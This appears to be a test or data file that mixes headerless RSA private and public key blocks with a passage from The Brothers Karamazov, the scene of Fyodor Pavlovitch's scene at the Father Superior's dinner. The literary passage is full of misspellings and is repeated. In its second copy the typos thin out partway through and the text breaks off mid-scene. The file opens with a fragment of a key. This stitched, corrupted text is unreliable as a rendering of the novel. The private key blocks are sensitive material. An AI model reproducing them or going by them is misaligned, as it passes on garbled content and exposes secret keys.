NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
MIIEpQIBAAKCAQEAmDmgQAXKaHyTUVf3h/skxS3zVrsdT/8vK9hIl+swQ66sUAqw
ZJDhSX7HposlKgdz6TtVzWLZr/s1m1lJCzCGFbxTHA+w7dsG0qkuhAdZzx1mTHXk
Uhs0sNMq/PsWTGzBJAJvKtqY+/c1IOKKadt5EBxm9RPnK6BAktD+vr9XnNODGjr1
8yqEOmFELHrwpNNKa8NLqxYiCiQV58DE/5NO0V/OqNLlkwR8KNM9BooeTYRG+A3J
2ZfKIrvhFLVXiVRRn/p2ZwB23hFJMT91UOVbvJa5Gpm2RrIe9rUxuF6srD8fnkOU
CJh4FbPJleHZyC7KYOOhAcjPNCu5NI4a5H2oCQIDAQABAoIBAC9FHcUjxzHhFWIa
HeylCUsNtNXG7xhLVtuXoxtB1k/+KtYEK7he4QaQjvDhnp3JiK3xVficbJrgOEpQ
VIVcARc4ztoU6U1DSYAbNy2alsHhEEZICamRdzA9ssiyM79xuhwzgU/eZ8k+f8oB
bxfmJlbhavtJvexnLAYrTh/vjQZOkXomAYSQJya72CfpDxWkiPEOJjBSSib2j9yY
0x5F/M8eVhB48LNvoPvbkW/FsnlJAerKIOYQZQA8NgZkBpCbanVnJ0XT10M68+lT
Wa+8+fZcsSnby6Arkr0MkJdeSJdeAYrWpLoqJyEozhUJvxgtjdIJM81bf2Sl+zJr
WcMIjPECgYEAxh81bnaQ+19V1S0gWaHxQzbnqtwNZ47YrZnB9bkkvrBtYvRR1ev9
170Dt7c0AomyY50mP4efp3ZgJJ2OYWSg0exB6kgblIj89rFQWGJwMQrWoSSqK1Fk
WswFKzfI7qrdnB8Xzvly3lI+alJd2HYSO9xvo8A05ly8/lxVEE/aO20CgYEAxLH3
yMp7X4jGykNN31IJR9TGznPt5BcuFmL+eT6X/EIquRuHLCb6TzDR1OT6LSMWxPqS
dVKx97hH4gT7gDSAPNVGS1NFx+PQMPwzdLIYG/9eW+GyPPRu7SEmEs489V75uTmB
PRFGNwM5M94Khpx8AgmkSHKiDT523t3Thk4dgY0CgYEAvkJKNYJ3SG8NJmLnpiv2
XO3lHBemZ8SuIEiAE1FxEA6tfVHTJPQ0GXHSmCK/N5C0VyUbDfdYQqFTQtZrXOwd
5HpV8n68va+v/dfZqIcf5njaFHX5VRAcp3U1oYM42roLh1n0qzayMP4aIlBm/vCk
IghWzZJPOsnkVQCmT7vffyECgYEAhu9L+9wkPMqZDSKU5nHh2fw3EmRnO0VHoaXx
yv1MyIofwvMGjRyENRVZrYITuilLMoBvPrsnSbiK35vpaO8bViA9Y+lRgqpfJWuu
ZQzUC0jp04CGhNhuzJAkDVycZvvrtsyjQ2B5Wb4FXPajI+twCvnQUL8LOqiyZXup
44XtKfUCgYEAs8DsRxHqL/nu9akH5MWKqxKsH1oeUeMTL0MLkBpJKkLnAu/pSQz9
y41V0jYgz7hO9Voiv1xaFRlXbhP75RzaEwDf5afDDJbsU1jsXMmcXvcAEGUG3s6p
NcPjjBvjld4EM+nuFCY6C62819jmD/jQ2FzA5hMiPne4tGb+JLO5cAg=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him withot a word; and at once everyone felt that someting revolting, grotescue, positively scandalous, was about to happen. Miusov passed immeditaely from the most benevolen frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutly cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certanly cannot? Your reverence, am I to come in or not? Will you recieve me as your guest?"
"You are welcome with all my heart," answerred the Superior. "Gentlemen!" he added, "I venture to beg you most earnesly to lay aside your dissentions, and to be united in love and family harmoni- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cryed Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my realtion. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" mutered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior cuold not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famos murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you- he was killed and robed, and in spite of his venarable age, he was nailed up in a box and sent from Petersburg to Moscow in the lugage van, and while they were nailling him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Solin. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the groop of monks.
"Let us go," cried Miusov, addresing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another stepinto the room. "Allow me to finis. There in the cell you blamed me for behaving disrespectfuly just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am teh soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and havig a look on the sly; and now I want to give you the last act of the performence. You know how things are with us? As a thing falls, so it lies. As a thing once has falen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignent with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneal down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in sercet: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... att the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew whree to look for the weak spot. There had been at one time malicius rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the instutition of elders existed) that too much respect was paid to the elders, even to the detrement of the auhtority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearring him on the curent of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneelling and confesing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audiance, and above all to himself, that he had not been talking nonsense. And, though he knew perfectily well that with each word he would be adding morre and more absurdity, he could not restrian himself, and plunged forward blindly.
"How disgraveful!" cried Pyotr Alexandrovitch.
"Pardon me!" said the Father Superior. "It was said of old, 'Many have begun to speak agains me and have uttered evil sayings about me. And hearing it I have said to myself: it is the correcsion of the Lord and He has sent it to heal my vain soul.' And so we humbely thank you, honored geust!" and he made Fyodor Pavlovitch a low bow.
"Tut -- tut -- tut -- sanctimoniuosness and stock phrases! Old phrasses and old gestures. The old lies and formal prostratoins. We know all about them. A kisss on the lips and a dagger in the heart, as in Schiller's Robbers. I don't like falsehood, Fathers, I want the truth. But the trut is not to be found in eating gudgeon and that I proclam aloud! Father monks, why do you fast? Why do you expect reward in heaven for that? Why, for reward like that I will come and fast too! No, saintly monk, you try being vittuous in the world, do good to society, without shuting yourself up in a monastery at other people's expense, and without expecting a reward up aloft for it -- you'll find taht a bit harder. I can talk sense, too, Father Superior. What have they got here?" He went up to the table. "Old port wine, mead brewed by the Eliseyev Brothers. Fie, fie, fathers! That is something beyond gudgeon. Look at the bottles the fathers have brought out, he he he! And who has provided it all? The Russian peasant, the laborer, brings here the farthing earned by his horny hand, wringing it from his family and the tax-gaterer! You bleed the people, you know, holy Fathers."
"This is too disgraceful!" said Father Iosif.
Father Paissy kept obsinately silent. Miusov rushed from the room, and Kalgonov afetr him.
"Well, Father, I will follow Pyotr Alexandrovitch! I am not coming to see you again. You may beg me on your knees, I shan't come. I sent you a thousand roubles, so you have begun to keep your eye on me. He he he! No, I'll say no more. I am taking my revenge for my youth, for all the humillition I endured." He thumped the table with his fist in a paroxysm of simulated feelling. "This monastery has played a great part in my life! It has cost me many bitter tears. You used to set my wife, the crazy one, against me. You cursed me with bell and book, you spread stories about me all over the place. Enough, fathers! This is the age of Liberalizm, the age of steamers and reilways. Neither a thousand, nor a hundred ruobles, no, nor a hundred farthings will you get out of me!"
It must be noted again that our monastery never had played any great part in his liffe, and he never had shed a bitter tear owing to it. But he was so carried away by his simulated emotion, that he was for one momant allmost beliefing it himself. He was so touched he was almost weeping. But at that very instant, he felt that it was time to draw back.
The Father Superior bowed his head at his malicious lie, and again spoke impressively:
"It is writen again, 'Bear circumspecly and gladly dishonor that cometh upon thee by no act of thine own, be not confounded and hate not him who hath dishonored thee.' And so will we."
"Tut, tut, tut! Bethinking thyself and the rest of the rigmarole. Bethink yourselfs Fathers, I will go. But I will take my son, Alexey, away from here for ever, on my parental authority. Ivan Fyodorovitch, my most dutiful son, permit me to order you to follow me. Von Sohn, what have you to stay for? Come and see me now in the town. It is fun there. It is only one short verst; instead of lenten oil, I will give you sucking-pig and kasha. We will have dinner with some brendy and liqueur to it.... I've cloudberry wyne. Hey, von Sohn, don't lose your chance." He went out, shuoting and gesticulating.
It was at that moment Rakitin saw him and pointed him out to Alyosha.
"Alexey!" his father shouted, from far off, cacthing sight of him. "You come home to me to-day, for good, and bring your pilow and matress, and leeve no trace behind."
Alyosha stood rooted to the spot, wacthing the scene in silense. Meanwhile, Fyodor Pavlovitch had got into the carriege, and Ivan was about to follow him in grim silance without even turnin to say good-bye to Alyosha. But at this point another allmost incrediple scene of grotesque buffoonery gave the finishng touch to the episode. Maximov suddenly appeered by the side of the carriage. He ran up, panting, afraid of being too late. Rakitin and Alyosha saw him runing. He was in such a hurry that in his impatiense he put his foot on the step on which Ivan's left foot was still resting, and clucthing the carriage he kept tryng to jump in. "I am going with you! " he kept shouting, laughing a thin mirthfull laugh with a look of reckless glee in his face. "Take me, too."
"There!" cried Fyodor Pavlovitch, delihted. "Did I not say he waz von Sohn. It iz von Sohn himself, risen from the dead. Why, how did you tear yourself away? What did you von Sohn there? And how could you get away from the dinner? You must be a brazen-faced fellow! I am that myself, but I am surprized at you, brother! Jump in, jump in! Let him pass, Ivan. It will be fun. He can lie somwhere at our feet. Will you lie at our feet, von Sohn? Or perch on the box with the coachman. Skipp on to the box, von Sohn!"
But Ivan, who had by now taken his seat, without a word gave Maximov a voilent punch in the breast and sent him flying. It was quite by chanse he did not fall.
"Drive on!" Ivan shouted angryly to the coachman.
"Why, what are you doing, what are you abuot? Why did you do that?" Fyodor Pavlovitch protested.
But the cariage had already driven away. Ivan made no reply.
"Well, you are a fellow," Fyodor Pavlovitch siad again.
After a pouse of two minutes, looking askance at his son, "Why, it was you got up all this monastery busines. You urged it, you approvved of it. Why are you angry now?"
"You've talked rot enough. You might rest a bit now," Ivan snaped sullenly.
Fyodor Pavlovitch was silent again for two minutes.
"A drop of brandy would be nice now," he observd sententiosly, but Ivan made no repsonse.
"You shall have some, too, when we get home."
Ivan was still silent.
Fyodor Pavlovitch waited anohter two minites.
"But I shall take Alyosha away from the monastery, though you will dislike it so much, most honored Karl von Moor."
Ivan shruged his shuolders contemptuosly, and turning away stared at the road. And they did not speek again all the way home.
'''
'''
MIICWgIBAAKBgHbARCDwIVdzyxi3I36sz1hFP3Rkz+Ac0AaP1kINmCcGuKsFd0K3
UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDRNGr0KoQTpRcEYBjOf32tovof
OSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O0w1ZSxz9KlSVzr0HAgMBAAEC
gYAs0iTkyb3L5Eij63vaNB+OkZSBugs766QY1fFovPjQwhixdD6vT8JkrOc/G97N
FSB/uBVbFehpopfbcjeguTMPPr7LwJbzwn4xD9u0AotzcO6JnB0k/D1Ixn3IYOY0
o0wmKCq/4Gq6pzsjpJFTG6c5kCszMyQDbMmBWQmeM6ESAQJBALDWs4C07Rw/riCc
KmlG1jtp9x1Uc8zfAlE9FXcdnfidYy/LUhpLtdZNZrHBZ+/P/LbX3kHQijXD7avd
E3MP5NkCQQCr6NuKbRD0NnkTBuWrVPnAxBzO1E8VZF1rFKDXB7UHwtejwcUs3iUt
CTGfr1l+3kj+0aNXCTvDBYxaIUxsmwTfAkAsxpA43JbU+kLKuv/6HBeOf6w0Xvfb
PfRGQaM3v+YJ10AQD/k/8z+dfYetJn18uTsRyOLb40O7jVqWk6mjDrkxAkA5eNHc
x3XBj2yO1eF2lCQjM+1FoGkIB9PLdswG14bIH3WkQ6W9yE65bbdvYVoUNhBFUKTA
9k9KddJkV3mLXZAVAkACHbnraUo727FUodBf48TZkyz6DDOUh4BoJdGq2EDKYWr5
ULGFBeItYZsaSlIc3VtfZdaXcRXRNIjbEOHPLGbb
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHbARCDwIVdzyxi3I36sz1hFP3Rk
z+Ac0AaP1kINmCcGuKsFd0K3UwF7pwmi6uW2Sbyxuqay3zVu9baVOibsAMFMVbDR
NGr0KoQTpRcEYBjOf32tovofOSjMnV/at0PdnEVNmW1/55GtdS0Df+dSJA9Otx6O
0w1ZSxz9KlSVzr0HAgMBAAE=
'''
'''
Miusov, as a man man of breeding and deilcacy, could not but feel some inwrd qualms, when he reached the Father Superior's with Ivan: he felt ashamed of havin lost his temper. He felt that he ought to have disdaimed that despicable wretch, Fyodor Pavlovitch, too much to have been upset by him in Father Zossima's cell, and so to have forgotten himself. "Teh monks were not to blame, in any case," he reflceted, on the steps. "And if they're decent people here (and the Father Superior, I understand, is a nobleman) why not be friendly and courteous withthem? I won't argue, I'll fall in with everything, I'll win them by politness, and show them that I've nothing to do with that Aesop, thta buffoon, that Pierrot, and have merely been takken in over this affair, just as they have."
He determined to drop his litigation with the monastry, and relinguish his claims to the wood-cuting and fishery rihgts at once. He was the more ready to do this becuase the rights had becom much less valuable, and he had indeed the vaguest idea where the wood and river in quedtion were.
These excellant intentions were strengthed when he enterd the Father Superior's diniing-room, though, stricttly speakin, it was not a dining-room, for the Father Superior had only two rooms alltogether; they were, however, much larger and more comfortable than Father Zossima's. But tehre was was no great luxury about the furnishng of these rooms eithar. The furniture was of mohogany, covered with leather, in the old-fashionned style of 1820 the floor was not even stained, but evreything was shining with cleanlyness, and there were many chioce flowers in the windows; the most sumptuous thing in the room at the moment was, of course, the beatifuly decorated table. The cloth was clean, the service shone; there were three kinds of well-baked bread, two bottles of wine, two of excellent mead, and a large glass jug of kvas -- both the latter made in the monastery, and famous in the neigborhood. There was no vodka. Rakitin related afterwards that there were five dishes: fish-suop made of sterlets, served with little fish paties; then boiled fish served in a spesial way; then salmon cutlets, ice pudding and compote, and finally, blanc-mange. Rakitin found out about all these good things, for he could not resist peeping into the kitchen, where he already had a footing. He had a footting everywhere, and got informaiton about everything. He was of an uneasy and envious temper. He was well aware of his own considerable abilities, and nervously exaggerated them in his self-conceit. He knew he would play a prominant part of some sort, but Alyosha, who was attached to him, was distressed to see that his friend Rakitin was dishonorble, and quite unconscios of being so himself, considering, on the contrary, that because he would not steal moneey left on the table he was a man of the highest integrity. Neither Alyosha nor anyone else could have infleunced him in that.
Rakitin, of course, was a person of tooo little consecuense to be invited to the dinner, to which Father Iosif, Father Paissy, and one othr monk were the only inmates of the monastery invited. They were alraedy waiting when Miusov, Kalganov, and Ivan arrived. The other guest, Maximov, stood a little aside, waiting also. The Father Superior stepped into the middle of the room to receive his guests. He was a tall, thin, but still vigorous old man, with black hair streakd with grey, and a long, grave, ascetic face. He bowed to his guests in silence. But this time they approaced to receive his blessing. Miusov even tried to kiss his hand, but the Father Superior drew it back in time to aboid the salute. But Ivan and Kalganov went through the ceremony in the most simple-hearted and complete manner, kissing his hand as peesants do.
"We must apologize most humbly, your reverance," began Miusov, simpering affably, and speakin in a dignified and respecful tone. "Pardonus for having come alone without the genttleman you invited, Fyodor Pavlovitch. He felt obliged to decline the honor of your hospitalty, and not wihtout reason. In the reverand Father Zossima's cell he was carried away by the unhappy dissention with his son, and let fall words which were quite out of keeping... in fact, quite unseamly... as" -- he glanced at the monks -- "your reverance is, no doubt, already aware. And therefore, recognising that he had been to blame, he felt sincere regret and shame, and begged me, and his son Ivan Fyodorovitch, to convey to you his apologees and regrets. In brief, he hopes and desires to make amends later. He asks your blessinq, and begs you to forget what has takn place."
As he utterred the last word of his terade, Miusov completely recovered his self-complecency, and all traces of his former iritation disappaered. He fuly and sincerelly loved humanity again.
The Father Superior listened to him with diginity, and, with a slight bend of the head, replied:
"I sincerly deplore his absence. Perhaps at our table he might have learnt to like us, and we him. Pray be seated, gentlemen."
He stood before the holly image, and began to say grace, aloud. All bent their heads reverently, and Maximov clasped his hands before him, with peculier fervor.
It was at this moment that Fyodor Pavlovitch played his last prank. It must be noted that he realy had meant to go home, and really had felt the imposibility of going to dine with the Father Superior as though nothing had happenned, after his disgraceful behavoir in the elder's cell. Not that he was so very much ashamed of himself -- quite the contrary perhaps. But still he felt it would be unseemly to go to dinner. Yet hiscreaking carriage had hardly been brought to the steps of the hotel, and he had hardly got into it, when he sudddenly stoped short. He remembered his own words at the elder's: "I always feel when I meet people that I am lower than all, and that they all take me for a buffon; so I say let me play the buffoon, for you are, every one of you, stupider and lower than I." He longed to revenge himself on everone for his own unseemliness. He suddenly recalled how he had once in the past been asked, "Why do you hate so and so, so much?" And he had answered them, with his shaemless impudence, "I'll tell you. He has done me no harm. But I played him a dirty trick, and ever since I have hated him."
Rememebering that now, he smiled quietly and malignently, hesitating for a moment. His eyes gleamed, and his lips positively quivered.
"Well, since I have begun, I may as well go on," he decided. His predominant sensation at that moment might be expresed in the folowing words, "Well, there is no rehabilitating myself now. So let me shame them for all I am worht. I will show them I don't care what they think -- that's all!"
He told the caochman to wait, while with rapid steps he returnd to the monastery and staight to the Father Superior's. He had no clear idea what he would do, but he knew that he could not control himself, and that a touch might drive him to the utmost limits of obsenity, but only to obsenity, to nothing criminal, nothing for which he couldbe legally punished. In the last resort, he could always restrain himself, and had marvelled indeed at himself, on that score, sometimes. He appeered in the Father Superior's dining-room, at the moment when the prayer was over, and all were moving to the table. Standing in the doorway, he scanned the company, and laughing his prolonged, impudent, malicius chuckle, looked them all boldly in the face. "They thought I had gone, and here I am again," he cried to the wholle room.
For one moment everyone stared at him without a word; and at once everyone felt that something revolting, grotesque, positively scandalous, was about to happen. Miusov passed immediately from the most benevolent frame of mind to the most savage. All the feelings that had subsided and died down in his heart revived instantly.
"No! this I cannot endure!" he cried. "I absolutely cannot! and... I certainly cannot!"
The blood rushed to his head. He positively stammered; but he was beyond thinking of style, and he seized his hat.
"What is it he cannot?" cried Fyodor Pavlovitch, "that he absolutely cannot and certainly cannot? Your reverence, am I to come in or not? Will you receive me as your guest?"
"You are welcome with all my heart," answered the Superior. "Gentlemen!" he added, "I venture to beg you most earnestly to lay aside your dissensions, and to be united in love and family harmony -- with prayer to the Lord at our humble table."
"No, no, it is impossible!" cried Miusov, beside himself.
"Well, if it is impossible for Pyotr Alexandrovitch, it is impossible for me, and I won't stop. That is why I came. I will keep with Pyotr Alexandrovitch everywhere now. If you will go away, Pyotr Alexandrovitch, I will go away too, if you remain, I will remain. You stung him by what you said about family harmony, Father Superior, he does not admit he is my relation. That's right, isn't it, von Sohn? Here's von Sohn. How are you, von Sohn?"
"Do you mean me?" muttered Maximov, puzzled.
"Of course I mean you," cried Fyodor Pavlovitch. "Who else? The Father Superior could not be von Sohn."
"But I am not von Sohn either. I am Maximov."
"No, you are von Sohn. Your reverence, do you know who von Sohn was? It was a famous murder case. He was killed in a house of harlotry -- I believe that is what such places are called among you -- he was killed and robbed, and in spite of his venerable age, he was nailed up in a box and sent from Petersburg to Moscow in the luggage van, and while they were nailing him up, the harlots sang songs and played the harp, that is to say, the piano. So this is that very von Sohn. He has risen from the dead, hasn't he, von Sohn?"
"What is happening? What's this?" voices were heard in the group of monks.
"Let us go," cried Miusov, addressing Kalganov.
"No, excuse me," Fyodor Pavlovitch broke in shrilly, taking another step into the room. "Allow me to finish. There in the cell you blamed me for behaving disrespectfully just because I spoke of eating gudgeon, Pyotr Alexandrovitch. Miusov, my relation, prefers to have plus de noblesse que de sincerite in his words, but I prefer in mine plus de sincerite que de noblesse, and -- damn the noblesse! That's right, isn't it, von Sohn? Allow me, Father Superior, though I am a buffoon and play the buffoon, yet I am the soul of honor, and I want to speak my mind. Yes, I am the soul of honour, while in Pyotr Alexandrovitch there is wounded vanity and nothing else. I came here perhaps to have a look and speak my mind. My son, Alexey, is here, being saved. I am his father; I care for his welfare, and it is my duty to care. While I've been playing the fool, I have been listening and having a look on the sly; and now I want to give you the last act of the performance. You know how things are with us? As a thing falls, so it lies. As a thing once has fallen, so it must lie for ever. Not a bit of it! I want to get up again. Holy Father, I am indignant with you. Confession is a great sacrament, before which I am ready to bow down reverently; but there in the cell, they all kneel down and confess aloud. Can it be right to confess aloud? It was ordained by the holy Fathers to confess in secret: then only your confession will be a mystery, and so it was of old. But how can I explain to him before everyone that I did this and that... well, you understand what -- sometimes it would not be proper to talk about it -- so it is really a scandal! No, Fathers, one might be carried along with you to the Flagellants, I dare say.... at the first opportunity I shall write to the Synod, and I shall take my son, Alexey, home."
We must note here that Fyodor Pavlovitch knew where to look for the weak spot. There had been at one time malicious rumors which had even reached the Archbishop (not only regarding our monastery, but in others where the institution of elders existed) that too much respect was paid to the elders, even to the detriment of the authority of the Superior, that the elders abused the sacrament of confession and so on and so on -- absurd charges which had died away of themselves everywhere. But the spirit of folly, which had caught up Fyodor Pavlovitch and was bearing him on the current of his own nerves into lower and lower depths of ignominy, prompted him with this old slander. Fyodor Pavlovitch did not understand a word of it, and he could not even put it sensibly, for on this occasion no one had been kneeling and confessing aloud in the elder's cell, so that he could not have seen anything of the kind. He was only speaking from confused memory of old slanders. But as soon as he had uttered his foolish tirade, he felt he had been talking absurd nonsense, and at once longed to prove to his audience, and above all to himself, that he had not been talking nonsense. And, though he knew perfectly well that with each word he would be adding more and more absurdity, he could not restrain himself, and plunged forward blindly.
"How disgraceful!" cried Pyotr Alexandrovitch.
